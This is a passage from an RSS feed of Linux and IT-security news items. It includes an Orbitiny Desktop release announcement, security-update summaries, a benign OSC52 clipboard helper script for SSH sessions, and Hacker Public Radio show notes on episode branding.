<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Thomas Evensen schraubt aktuell an Version 2.8.5 seines Tools RsyncUI (rsync ist ein leistungsstarkes und vielseitiges Befehlszeilen-Tool zur Synchronisierung von Dateien und Verzeichnissen zwischen verschiedenen Computern oder innerhalb des gleichen Computers). Die Software befindet sich derzeit noch in der Entwicklung,...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/rsyncui-2-8-5-frische-optik-und-inspector-ansicht-in-arbeit/">RsyncUI 2.8.5: Frische Optik und Inspector-Ansicht in Arbeit</a>
</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Orbitiny Desktop Pilot 8 Release - The Biggest and Most Significant Release Ever (To Date) - Now Also With a Graphical System-Wide Installer]]></title>
<description><![CDATA[Orbitiny Desktop is a new and innovative desktop environment for Linux bringing you exclusive features and functionalities unavailable in other desktop environments. These features include: desktop gestures, icon emblems for files on the clipboard (cut or copied), icon emblems for new or modified...]]></description>
<link>https://tsecurity.de/de/3183496/linux-tipps/orbitiny-desktop-pilot-8-release-the-biggest-and-most-significant-release-ever-to-date-now-also-with-a-graphical-system-wide-installer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3183496/linux-tipps/orbitiny-desktop-pilot-8-release-the-biggest-and-most-significant-release-ever-to-date-now-also-with-a-graphical-system-wide-installer/</guid>
<pubDate>Mon, 29 Dec 2025 02:52:45 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><strong>Orbitiny Desktop</strong> is a new and innovative desktop environment for Linux bringing you <strong>exclusive</strong> features and functionalities <strong>unavailable</strong> in other desktop environments.</p> <p>These features include: <strong>desktop gestures</strong>, <strong>icon emblems</strong> for files on the clipboard (<strong>cut</strong> or <strong>copied</strong>), <strong>icon emblems</strong> for new or modified files, <strong><em>icon emblems</em></strong> for empty files and directories, <strong>multi-paste support</strong>, (pasting to multiple selected directories), <strong>dedicated icons</strong> for mounted and user account home directories, <strong>custom desktop</strong> <strong>directories</strong>, <strong>individual desktop directory per monitor</strong>, <strong>individual desktop directory per virtual desktop</strong> and a lot more!</p> <p><em>All of these features are exclusive to Orbitiny only, and if you see anyone else doing the same thing, just know that you first saw it in</em> <strong><em>Orbitiny Desktop</em></strong>*, a desktop that* <strong><em>focuses on functionality</em></strong>*,* <strong><em>features</em></strong>*,* <strong><em>innovation</em></strong> <em>and</em> <strong><em>extensibility</em></strong> <em>while keeping traditional and familiar appearance.</em></p> <p>Due to its <em>superior</em> portable and modular design, Orbitiny can be run in portable mode (no installation required) <em>or</em> can be installed to any directory. To run it in portable mode, just launch the <strong>start-orbitiny</strong> script. In portable mode, all the settings will be saved in the directory the <strong>start-orbitiny</strong> script is in. You can then copy this folder to a USB stick, take it with you, go to another Linux computer and launch the script again and all the settings and configurations will still be there.</p> <p><strong>As a system-wide desktop</strong> (non-portable mode), the settings will be saved to <strong>$HOME/.config/orbitiny</strong> for each user.</p> <p><a href="https://preview.redd.it/s20b2uh7v0ag1.png?width=1920&amp;format=png&amp;auto=webp&amp;s=42116e342fe251bdd5a133977220a40530baa0f3">https://preview.redd.it/s20b2uh7v0ag1.png?width=1920&amp;format=png&amp;auto=webp&amp;s=42116e342fe251bdd5a133977220a40530baa0f3</a></p> <p>What's so special about this release? I have replaced / recoded nearly the entire foundation of the project. Users wanted a system-wide installation, many asked for it but originally Orbitiny was designed to be run as a portable guest-desktop only, a desktop on top of another and the existing instructions provided were pretty much a hack which did not work very well.</p> <p>In order to achieve what people asked for, I had go back to the drawing board, redesign the whole structure and scrap a <strong>huge</strong> amount of old code and redo the whole thing again while still keeping the original portability as an option. So, you can still run it as a portable desktop <strong>but now, you can also install it properly like any other desktop.</strong> Best of all? It won't put files all over your system. It installs in a folder/directory with all the files needed to run also installed in that directory.</p> <p>Next, I have detached a <strong>huge</strong> amount of code into separate apps <strong>not</strong> attached to the desktop. This means, if they crash, they won't take the desktop down and I am still not done yet, I will be spinning off the <strong>awesome clipboard manager</strong> that can also track and record files in the clipboard, <strong>not just text like all other ones.</strong> For instance, you can set <strong>file1</strong> to the clipboard, then also set some text to the clipboard, open up the clipboard manager window and then you just double click on file1 to set it back to the clipboard OR grab the entry and drag it away from the clipboard manager's window into another application.</p> <p><strong>I have created a proper foundation for theming</strong>, finally!</p> <p>Now Orbitiny can be properly themed however at this point of time, I have not developed a theme manager yet so if you want to change themes, you are going to have to set the theme via a config file.</p> <p><strong>I have also extended the functionality of virtual desktops</strong>. Not only can you switch virtual desktops per se (and hide other windows), with Orbitiny <strong>you can also switch to different desktop directories when you click on a virtual desktop button</strong> so you can assign a desktop path per virtual desktop button. End result? It's like switching TV channels or a using an HDMI switcher or a different computer.</p> <p>Next, I have added a real-time monitor for the desktop's settings. So you can open up the config file (a plain ASCII Text/INI file) edit it, save it and the desktop detects the change and immediately applies the setting. For example, you can set a different desktop directory, change a wallpaper etc.</p> <p>A <strong>huge</strong> amount of bugs have been fixed (and there are more which will <strong>be</strong> fixed).</p> <p>Orbitiny is <strong>not</strong> a small project. It's huge and consists of <strong>47 different components</strong>.</p> <p><strong>45 external programs</strong> (including the plugins) + <strong>2 internal ones</strong> (the clipboard manager and the dashboard which will too be spun off). I created them all from scratch and I manage them all. It's a real desktop environment eco-system.</p> <p>So, I started this project due to my <strong>huge</strong> disappointment of the Linux desktop offerings back when I switch to Linux in 2014 and to this date, that disappointment still remains.</p> <p>As the developer of Orbitiny, I focus on <strong>functionality</strong> and innovation.</p> <h1>1.0 Pilot 8 - Release Notes:</h1> <p><strong>New Features:</strong></p> <ul> <li><strong>New</strong>: Implemented a brand new icon-driven Control Panel and spun off each configuration utility into its own independent module / app. This way if the spun-off configuration utility crashes, it won't take the entire desktop down (this wasn't the case in previous releases).</li> <li><strong>New:</strong> Implemented a <strong>live/real-time</strong> desktop settings monitoring. If the desktop's <strong>settings.ini</strong> file gets changed, the settings get applied immediately right after the file is saved. This is equivalent to some other DEs using a registry-like way of doing things in real-time except that Orbitiny uses traditional text files instead of human-unreadable binary blobs that only a computer can read.</li> <li><strong>New:</strong> Added an additional functionality to the Virtual Desktops applet for the panel (workspace switcher) - now when switching virtual desktops (1 2, 3 etc), not only will it hide windows and task buttons from other desktops, it will also switch to different desktop directories so you have a separate desktop directory per virtual desktop, it's like switching to a different computer literally.</li> <li><strong>New:</strong> Add a "Mark as Safe" option to the script action prompt dialog for script files. If the default option about what to do with script files has been set to "Ask", now you also have a "Run &amp; Mark as Safe" button and the next time you run the script, you won't be prompted even if the default action is set to "Ask" in Orbitiny Desktop settings. This works by recording the checksum of the script in a file and the next time you launch the file, it checks to see if the checksum exists.</li> <li><strong>New:</strong> Added an "Empty Folder/File" icon emblem to Orbitiny's File Manager (Qutinty) file icons to empty directories. This will visually show you when a directory is empty. This way you don't have to go to open up Properties or navigate inside the folder to see if there is content.</li> <li><strong>New:</strong> Created an Orbitiny Desktop graphical installer for system-wide installaton and this way you can use Orbitiny as a standalone independent desktop.</li> <li><strong>New:</strong> Implemented automatic process restarting. If the panel or the desktop crash, they will automatically relaunch. <strong>This is especially vital when running Orbitiny as a stand-alone and independent desktop started from a display manager</strong>. So you won't be left with a blank X11 window in case of a crash.</li> <li><strong>New</strong>: Added liquid-like fluid/fade-in desktop effects to desktop icons when you hover over them.</li> <li><strong>New</strong>: Implemented a dynamic theme engine and a theme manager - themes are no longer static and styles can be modified by editing a CSS file on the disk</li> <li><strong>New</strong>: Added 3D-Like (Drop Shadow) text effect to desktop icons. To turn this On or Off, go to <strong>Control Panel-&gt;Desktop Icons</strong> and check/uncheck "<strong>Use Drop Shadow Effect in Icon Captions</strong>"</li> <li><strong>New</strong>: Added "<strong>Paste with rsync</strong>" option to the right-click context menus. When selected, it opens up a terminal window and copies the files using the <strong>Rsync</strong> utility. It's also getting passed to the "<strong>time</strong>" command so you can see how long it takes for the operation to complete</li> <li><strong>New</strong>: Created a Plugin Manager for Orbitiny Panel - Now you can keep adding plugins by double-clicking an on item in the Plugin Manager and close it when you are done with it.</li> <li><strong>New</strong>: Created a Theme Manager for Orbitiny Panel - As with the plugin manager, it's all in one window and you can apply themes just by double clicking on it or clicking the "Apply" button. There is also "Rename", "Open Theme Directory", "Export Selected", "Delete Selected" - all in one window so you no longer have to go through multiple menus / submenus (very troublesome and I was aware of it) just to select a theme.</li> <li><strong>New</strong>: Created a Panel Manager for Orbitiny Panel - Enables you to create, delete, rename, activate and deactivate panels via a simple toggle button from one central point as shown on the screenshot below. As with the theme management, gone are the times where you'd have to go through several clicks and submenus to get to the action you need (it even annoyed me) every time you need to manage a panel.</li> <li><strong>New</strong>: Created a Profile Manager for Orbitiny Panel - Enables you to create, delete, rename, activate and deactivate panel profiles. A panel profile is simply a panel directory with a set of various applet configurations. Each profile can have/hold a different set of applets and you can easily switch between. The ability to quickly access profiles by clicking the button on the right-hand side on the panel remains and will remain, it's a core feature.</li> <li><strong>New</strong>: Added <strong>CTRL+Insert</strong> keyboard shortcut as an alternative to <strong>CTRL+C</strong> for copying files.</li> <li><strong>New:</strong> Added "<strong>Set as Wallpaper</strong>" option to Orbitiny's file manager's (Qutiny) file context menu.</li> <li><strong>New:</strong> Completely redesigned the wallpaper selection utility. The old one uses the <strong>Qutinty</strong> file manager as a component to show thumbnails and it is a temporary work-around. The new one (see below) is properly designed from scratch and looks much better because it is designed to be a proper wallpaper picker, not a cut-down file manager showing files with thumbnails and using it as an image viewer. I had to do a lot of hacks to integrate Qutiny and get it to work as a wallpaper picker.</li> <li><strong>New:</strong> Implemented a brand new theme for the Orbitiny file manager (Qutiny), called Coconut</li> <li><strong>New:</strong> Fully intgerated the panel into the Orbitiny Desktop. Now when you drag-drop a folder/dir to it from a file manager/desktop or manually add it and you click on it, it will use the file manager set in Orbitiny's settings (done via the Control Panel)</li> <li><strong>New:</strong> Implemented a brand new Preferences dialog for Orbitiny's Panel following the new UI designs found in the Orbitiny Desktp's control panel</li> <li><strong>New:</strong> In the file manager, changed the default key-press action to filter items rather then selecting them.</li> <li><strong>New:</strong> Implemented a "VIP Configuration Files" list that when attempted to delete any of the files in the list, it warns you that the file you are about to delete is an important configuration file and it asks if you sure you want to continue. The list of files is read and loaded dynamically from a file called vip_files.conf and by default it consists of 11 files including .config, .local, Desktop and others.</li> <li><strong>New:</strong> Added a "Desktop Background / Wallpaper" menu entry to the Desktop's right-click context menu</li> <li><strong>New:</strong> Created a backend API for a global theme manager and exemplary demonstration (not finished yet) in Orbitiny's Control Panel-&gt;Appearance (again, this is an example only, far from finished)</li> </ul> <p><strong>Bug Fixes:</strong></p> <ul> <li><strong>BugFix</strong>: Fixed a delay/lag when desktop icons are repositioned/dragged to another tile/slot on the desktop</li> <li><strong>BugFix</strong>: Fixed a terrible panel resizing bug when panel is docked to the right-hand side of the screen and the user attempts to resize it by grabbing and holding panel's outer edge border</li> <li><strong>BugFix</strong>: FIxed an annoying (but easy to fix) intermittent file selection issue in Qutiny (Orbitiny's File Manager) - sometimes an item appears selected but when you click Ctrl+C/X to copy/paste or right click on it and select any action, you get an error message saying that 0 files are selected even though clearly there is a selection and clicking on it again to reselect the item does not fix the issue. This is now all fixed.</li> <li><strong>BugFix</strong>: Fixed a performance issue when a desktop wallpaper is used on high resolution screens displays</li> <li><strong>BugFix</strong>: Fixed a SysTray issue sometimes not appearing when its configuration is changed (The issue goes away after the panel is restarted)</li> <li><strong>BugFix</strong>: Fixed an issue when trying to adjust vertical applet spacing, it adjusts horizontal and vica versa</li> <li><strong>BugFix</strong>: Fixed an intermittent crash with the Orbitiny's Clipboard Manager when an item is double clicked to activte it and a consistent bug with HTML data not getting set on the clipboard</li> <li><strong>BugFix</strong>: Fixed a Drag&amp;Drop error with desktop tiles (icons) - <strong>intermittently</strong> when you release an item over an empty area, it is mistakenly deemed as a valid non-blank item so the dragged-to-item popup menu would appear while referencing a wrong tile target.</li> <li><strong>BugFix</strong>: Fixed another Drag&amp;Drop error with desktop icons - Sometimes when you attempted to resposition an icon to another avaiable tile, it would not work. This is now fixed ant it is butterly smooth.</li> <li><strong>BugFix</strong>: Fixed a panel Drag&amp;Drop crashing bug when you drag a file to it to add it</li> <li><strong>BugFix</strong>: Fixed popup menus appearing in the wrong screen position when invoked via desktop gestures</li> <li><strong>BugFix</strong>: Fixed desktop icon tile repositioning - Sometimes when trying to reposition a desktop icon, it would fail the first time (and sometimes the second. It is now fixed).</li> <li><strong>BugFix</strong>: Fixed a horizontal panel length issue with the panel when docked from a vertical position to a horizontal position.</li> <li><strong>BugFix</strong>: Fixed a panel resing issue when the panel is docked to the top of the screen and you try to grab the panel outer edge border and resize it</li> <li><strong>BugFix</strong>: Fixed a Clipboard Manager issue not working when text is copied to the clipboard (only worked with files and images)</li> <li><strong>BugFix</strong>: Fixed another Clipboard Manager issue - when the Clipboard Manager is shown and item is added to the clipboard, the item height added to the window is super large</li> <li><strong>BugFix</strong>: Fixed an issue with the panel audio applet not working.</li> <li><strong>BugFix</strong>: Fixed being unable to delete a custom application entry in right-click "<strong>Open With</strong>" context submenus</li> <li><strong>BugFix</strong>: Fixed "<strong>Show Disks and Partitions Menu</strong>" and "<strong>Show Designated Directories Menu</strong>" configuration change not being obeyed on the desktop</li> <li><strong>BugFix</strong>: Fixed an intermittent issue in Qutiny file manager where it mistakenly loads a preview when an image is clicked but in fact, preview is turned off (intermittent issue).</li> <li><strong>BugFix</strong>: Fixed an intermittent crash with the "Run Command" combox box in Orbitiny Desktop's context menu</li> <li><strong>BugFix</strong>: Fixed the old broken "Empty Trash Can" dialog being invoked when "Empty Trash Can" is selected</li> <li><strong>BugFix</strong>: Fixed an intermittent bug with desktop icon filtering. Sometimes when you hit a key to start desktop icon filtering, the search filter pops up on the screen but the initial character you pressed would not be inserted. This is definitively fixed.</li> <li><strong>BugFix</strong>: Fixed a very difficult to catch and very annoying intermittent crash triggered by std::string throwing std::bad_alloc affecting <strong>all</strong> components</li> <li><strong>BugFix</strong>: Fixed a "Detecting devices" toast message not disappearing in Orbitiny Device Manager on start up</li> <li><strong>BugFix</strong>: Fixed a file move issue - When moving files, user was not prompted to overwrite / replace exisiting files</li> <li><strong>BugFix</strong>: Fixed a high CPU usage (1%-2% while idling) in Orbitiny's File Manager (Qutinty)</li> <li><strong>BugFix</strong>: Fixed small step icon size adjustments in the file browser when adjusting using the mouse wheel</li> <li><strong>BugFix</strong>: Fixed a "Move to Screen" issue - if the panel is docked to the bottom of the screen and you try to move it to a screen with a higher display resolution, it miscalculated the other's screen's hight so the panel ended up a floating instead of being docked</li> <li><strong>BugFix</strong>: Fixed various graphical theme issues such as some applets having inconsistent sizes (albeit about 2-3 pixels, it is there and I wanted it fixed)</li> </ul> <p>** Application Porting **</p> <ul> <li><strong>Audio Control</strong>: Ported <strong>pavucontrol-qt</strong> (from LXQt) to Orbitiny.</li> </ul> <p>I have been working every day for well over a month for this release and people that follow me on the Orbitiny subreddit are well aware of what I've been doing as I have been providing regular updates.</p> <p>Subreddit: <a href="https://www.reddit.com/r/Orbitiny/">https://www.reddit.com/r/Orbitiny/</a></p> <p>YouTube: <a href="https://www.youtube.com/@Orbitiny-Linux">https://www.youtube.com/@Orbitiny-Linux</a> - here you can see some of the features I have described here.</p> <p>Download: <a href="https://sourceforge.net/projects/orbitiny-desktop/files/latest/download">https://sourceforge.net/projects/orbitiny-desktop/files/latest/download</a></p> <p>Source Code: <a href="https://gitea.com/sasko.usinov/orbitiny-desktop">https://gitea.com/sasko.usinov/orbitiny-desktop</a></p> <p>The new code will ready within 24 hours as I am now very, very tired and I need to get a break because a lot of things have changed.</p> <p>Also, a special announcement: Orbitiny Linux is coming and I am about to launch <a href="http://orbitiny.org/">orbitiny.org/</a> | <a href="http://orbitiny.com/">orbitiny.com</a> and <a href="http://orbitiny.net/">orbitiny.net</a> (still no working website yet but it is coming).</p> <p>P.S. I apologize in advance for any bugs you may find, just report it and I will do everything I can to fix it.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/sash-au"> /u/sash-au </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1py5avz/orbitiny_desktop_pilot_8_release_the_biggest_and/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1py5avz/orbitiny_desktop_pilot_8_release_the_biggest_and/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (container-tools:rhel8, grafana, opentelemetry-collector, and thunderbird), Red Hat (kernel), and SUSE (cheat, libsoup, mariadb, mozjs52, python310, python315, qemu, rsync, and zk).]]></description>
<link>https://tsecurity.de/de/3177922/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3177922/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 24 Dec 2025 15:07:07 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (container-tools:rhel8, grafana, opentelemetry-collector, and thunderbird), <b>Red Hat</b> (kernel), and <b>SUSE</b> (cheat, libsoup, mariadb, mozjs52, python310, python315, qemu, rsync, and zk).]]></content:encoded>
</item>
<item>
<title><![CDATA[Pufferüberlauf in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3177821/it-security-nachrichten/pufferueberlauf-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3177821/it-security-nachrichten/pufferueberlauf-in-rsync-suse/</guid>
<pubDate>Wed, 24 Dec 2025 13:50:25 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Tiny OSC52 clipboard helper from remote servers — useful or redundant?]]></title>
<description><![CDATA[Working locally on macOS I got very used to piping things into pbcopy... configs, logs, whole files, so I could inspect or paste them elsewhere in one command. When working on remote Linux servers over SSH, I really missed that workflow, so I put together a small helper using OSC52 to send data f...]]></description>
<link>https://tsecurity.de/de/3176985/linux-tipps/tiny-osc52-clipboard-helper-from-remote-servers-useful-or-redundant/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3176985/linux-tipps/tiny-osc52-clipboard-helper-from-remote-servers-useful-or-redundant/</guid>
<pubDate>Wed, 24 Dec 2025 02:39:10 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Working locally on macOS I got very used to piping things into pbcopy... configs, logs, whole files, so I could inspect or paste them elsewhere in one command.</p> <p>When working on remote Linux servers over SSH, I really missed that workflow, so I put together a small helper using OSC52 to send data from a remote shell directly into my local clipboard (tested with iTerm2).</p> <p>Here’s the script:</p> <pre><code>#/usr/local/bin/rc #!/usr/bin/env bash set -euo pipefail usage() { cat &lt;&lt;'USAGE' &gt;&amp;2 Usage: rcopy &lt;file&gt; rcopy - &lt; &lt;(command) rcopy -p "literal text" Env: RCOPY_MAX_BYTES=75000 USAGE exit 2 } max_bytes="${RCOPY_MAX_BYTES:-75000}" mode="file"; literal=""; src="" [[ $# -ge 1 ]] || usage case "$1" in -h|--help) usage;; -p|--print) mode="literal"; literal="${2-}"; [[ -n "$literal" ]] || usage;; -) mode="stdin";; *) mode="file"; src="$1";; esac tmp="$(mktemp)" trap 'rm -f "$tmp"' EXIT if [[ "$mode" == "literal" ]]; then printf '%s' "$literal" &gt;"$tmp" elif [[ "$mode" == "stdin" ]]; then cat &gt;"$tmp" else [[ -f "$src" ]] || { echo "rcopy: not a file: $src" &gt;&amp;2; exit 1; } cat -- "$src" &gt;"$tmp" fi bytes="$(wc -c &lt;"$tmp" | tr -d ' ')" if (( bytes &gt; max_bytes )); then echo "rcopy: ${bytes} bytes exceeds limit ${max_bytes}. Refusing." &gt;&amp;2 exit 1 fi b64="$(base64 &lt;"$tmp" | tr -d '\n')" printf '\033]52;c;%s\033\\' "$b64" echo "Sent ${bytes} bytes via OSC52" &gt;&amp;2 </code></pre> <p>Now I can do things like:</p> <p><code>rcopy nginx.conf</code></p> <p><code>journalctl -u foo | rcopy -</code></p> <p>…and paste locally to inspect, diff, or share elsewhere.</p> <p>I’m curious:</p> <ul> <li>Do people already use something similar?</li> <li>Is there an existing tool that does this better / more cleanly?</li> <li>Or is this a reasonable quality-of-life hack for SSH-heavy workflows?</li> </ul> <p>Genuinely interested whether this is useful or just reinventing something obvious.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/re-verse"> /u/re-verse </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1ptydpi/tiny_osc52_clipboard_helper_from_remote_servers/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ptydpi/tiny_osc52_clipboard_helper_from_remote_servers/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4538: HPR Branding]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


HPR Branding




This episode refers to the initial release of 
https://repo.anhonesthost.net/HPR/hpr_documentation/src/branch/main/branding.md
 




The Intro

Duration

It will always be 30 seconds long and in some edge cases may be slightly lo...]]></description>
<link>https://tsecurity.de/de/3176919/podcasts/hpr4538-hpr-branding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3176919/podcasts/hpr4538-hpr-branding/</guid>
<pubDate>Wed, 24 Dec 2025 01:03:24 +0100</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<h1>
HPR Branding</h1>
<p>
<br>
</p>
<p>
This episode refers to the initial release of <a href="https://repo.anhonesthost.net/HPR/hpr_documentation/src/branch/main/branding.md" rel="noopener noreferrer" target="_blank">
https://repo.anhonesthost.net/HPR/hpr_documentation/src/branch/main/branding.md</a>
 </p>
<p>
<br>
</p>
<h2>
The Intro</h2>
<h3>
Duration</h3>
<p>
It will always be 30 seconds long and in some edge cases may be slightly longer. The following table will help put that into context. It gives the percentage of the show the intro takes related to the length of the shows.</p>
<p>
<br>
</p>
<pre class="ql-syntax" spellcheck="false">
  1.7% of an average show (29 minutes 30 seconds)
  0.1% of our longest show (7 hours 27 minutes)
187.5% of our shortest show (16 seconds)
</pre>
<h3>
Breakdown</h3>
<h3>
Generation</h3>
<p>
The intro is generated by the <a href="https://repo.anhonesthost.net/HPR/hpr-tools/src/branch/main/workflow/process_episode.bash#L1388-L1391" rel="noopener noreferrer" target="_blank">
process_episode.bash</a>
 script and uses the <a href="https://repo.anhonesthost.net/HPR/hpr_hub/src/branch/main/cms/say.php" rel="noopener noreferrer" target="_blank">
say.php</a>
 file to generate the data.</p>
<p>
The text is <a href="https://repo.anhonesthost.net/HPR/hpr-tools/src/branch/main/workflow/process_episode.bash#L1427" rel="noopener noreferrer" target="_blank">
created</a>
 using <a href="https://github.com/rhasspy/piper" rel="noopener noreferrer" target="_blank">
piper test to speech</a>
. It was previously created using <a href="https://espeak.sourceforge.net/" rel="noopener noreferrer" target="_blank">
espeak</a>
, and we are open to <a href="https://repo.anhonesthost.net/HPR/hpr_hub/issues/new" rel="noopener noreferrer" target="_blank">
suggestions</a>
 on how to improve it.</p>
<p>
The text is played over the HPR Theme Music</p>
<p>
<br>
</p>
<h3>
Theme Music Credits</h3>
<p>
The background is an arrangement by <a href="https://repo.anhonesthost.net/HPR/hpr_website/src/branch/main/www/theme/intro-ak-Maestraccio-cc-by-4.0.mp3" rel="noopener noreferrer" target="_blank">
Maestraccio</a>
 which is released under the <a href="https://creativecommons.org/licenses/by-sa/4.0/" rel="noopener noreferrer" target="_blank">
Creative Commons Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)</a>
 license, of the HPR Theme, composed by <a href="https://hackerpublicradio.org/correspondents/0042.html" rel="noopener noreferrer" target="_blank">
slick0</a>
 which has <a href="https://creativecommons.org/publicdomain/zero/1.0/" rel="noopener noreferrer" target="_blank">
No Copyright</a>
 applied.</p>
<p>
<br>
</p>
<h3>
Message</h3>
<p>
To effectively communicate an event it’s important to convey the answers to <strong>
Who?</strong>
, <strong>
What?</strong>
, <strong>
When?</strong>
, <strong>
Where?</strong>
, and <strong>
Why?</strong>
</p>
<p>
<br>
</p>
<blockquote>
The Five Ws is a checklist used in journalism to ensure that the lead contains all the essential points of a story. As far back as 1913, reporters were taught that the lead should answer these questions about the situation being reported.</blockquote>
<p>
<a href="https://en.wikipedia.org/wiki/Five_Ws" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/Five_Ws</a>
</p>
<p>
<br>
</p>
<h4>
What?, When?, Where?</h4>
<p>
The first sentence is always <strong>
This is Hacker Public Radio episode (show id) for “(day of week)” the “(day number)” of “(month and year).</strong>
</p>
<p>
Saying the name of the show at the beginning of an episode is called establishing <a href="https://en.wikipedia.org/wiki/Brand_awareness#Brand_recognition" rel="noopener noreferrer" target="_blank">
brand recognition</a>
. It is standard for podcasts, TV and Radio shows as well as on broadcast networks, not to mention the pre-rolls in a movie.</p>
<p>
We started to do it because some of our Visually Impaired users appreciated knowing what show is playing. Now the same reason can be applied to everyone as the use of visual controlled <a href="https://en.wikipedia.org/wiki/User_interface" rel="noopener noreferrer" target="_blank">
User interfaces</a>
 have diminished. Most people control the playlist with headset or voice controls.</p>
<p>
Saying the show id, and date is common where there are a lot of episodes eg: news or weather shows. It is often skipped where the content is sufficient to identify the episode, eg “the last episode of the foo bar baz podcast, or the last Saturday Night Live”</p>
<p>
We include the show id and date to allow the listener to refer to the episode easily. As we have literally thousands of shows, we need to help people identify which show they are now listening to, so that it can be easily shared, or commented on.</p>
<p>
<br>
</p>
<h4>
What? Why?</h4>
<p>
We always include <strong>
Today’s show is entitled. (title)</strong>
. If the episode is part of a series then we also include <strong>
It is part of the series (series name)</strong>
. We always include the show <strong>
(synopsis)</strong>
.</p>
<p>
This tells the listener what the show is about. It allows them to skip the episode if they wish. They may wish to do this for many reasons, for example:</p>
<p>
<br>
</p>
<ul>
<li>
because they are not interested in the topic,</li>
<li>
they wish to listen to it while in front of a computer to reference the accompanying show notes,</li>
<li>
they are listening in public and the topic might not be appropriate.</li>
</ul>
<h4>
Who?</h4>
<p>
The next part will either be <strong>
It is the first show by new host (host name)</strong>
, <strong>
It is the (multiple of 10)th show of (host name)</strong>
, or <strong>
It is hosted by (host name)</strong>
</p>
<p>
We are required by the <a href="https://creativecommons.org/licenses/by-sa/4.0/" rel="noopener noreferrer" target="_blank">
Creative Commons Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)</a>
 license to credit our hosts, so we do.</p>
<p>
We think it’s important to highlight new hosts especially, so our community we encourage them to continue to contribute.</p>
<p>
It’s also nice to call out hosts who have been contributing a lot by highlighting each 10th show they send in.</p>
<p>
<br>
</p>
<h4>
Where?</h4>
<p>
We always include <strong>
and is about (minutes)minutes long</strong>
 to give people an idea of how long the show is.</p>
<p>
Normal broadcasts have to fit neatly into a standard TV/Radio Broadcast schedule. Many podcasters now follow the same tradition of having episodes of a predictable length. Eg: 30 minutes or an hour.</p>
<p>
On HPR, <a href="https://hackerpublicradio.org/about.html" rel="noopener noreferrer" target="_blank">
there is no restriction on how long the show can be</a>
 so it’s desirable to give the listener a way to know how long the episode is so they can plan accordingly.</p>
<p>
<br>
</p>
<h4>
Warning</h4>
<p>
We always include either <strong>
It carries a clean flag</strong>
 or <strong>
It carries an explicit flag</strong>
.</p>
<p>
This is also common for broadcasts where they are dealing with a topic that may be disturbing to some people.</p>
<p>
<br>
</p>
<h4>
What</h4>
<p>
We always include <strong>
The summary is. (summary)</strong>
.</p>
<p>
As this also tells the listener what the show is about.</p>
<p>
<br>
</p>
<h4>
License</h4>
<p>
In the event that the show is not released <a href="https://creativecommons.org/licenses/by-sa/4.0/" rel="noopener noreferrer" target="_blank">
CC-BY-SA</a>
 we include <strong>
Todays show is licensed under a (license_long_name) license.</strong>
</p>
<p>
<br>
</p>
<h2>
Outro</h2>
<h3>
Theme Music Credits</h3>
<p>
The background is an arrangement by <a href="https://repo.anhonesthost.net/HPR/hpr_website/src/branch/main/www/theme/intro-ak-Maestraccio-cc-by-4.0.mp3" rel="noopener noreferrer" target="_blank">
Maestraccio</a>
 which is released under the <a href="https://creativecommons.org/licenses/by-sa/4.0/" rel="noopener noreferrer" target="_blank">
Creative Commons Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)</a>
 license, of the HPR Theme, composed by <a href="https://hackerpublicradio.org/correspondents/0042.html" rel="noopener noreferrer" target="_blank">
slick0</a>
 which has <a href="https://creativecommons.org/publicdomain/zero/1.0/" rel="noopener noreferrer" target="_blank">
No Copyright</a>
 applied.</p>
<p>
Over the music is the following text recorded by <a href="https://hackerpublicradio.org/correspondents/0449.html" rel="noopener noreferrer" target="_blank">
Manon</a>
 which has <a href="https://creativecommons.org/publicdomain/zero/1.0/" rel="noopener noreferrer" target="_blank">
No Copyright</a>
 applied.</p>
<p>
You have been listening to Hacker Public Radio at <a href="https://hackerpublicradio.org/" rel="noopener noreferrer" target="_blank">
hackerpublicradio.org</a>
.</p>
<p>
Today’s show was contributed by a HPR listener like yourself.</p>
<p>
If you ever thought of recording a podcast, then click on our contribute link to find out how easy it really is.</p>
<p>
Hosting for HPR has been kindly provided by <a href="https://anhonesthost.com/" rel="noopener noreferrer" target="_blank">
anhonesthost.com</a>
, the <a href="https://archive.org/" rel="noopener noreferrer" target="_blank">
Internet Archive</a>
 and <a href="https://www.rsync.net/" rel="noopener noreferrer" target="_blank">
rsync.net</a>
.</p>
<p>
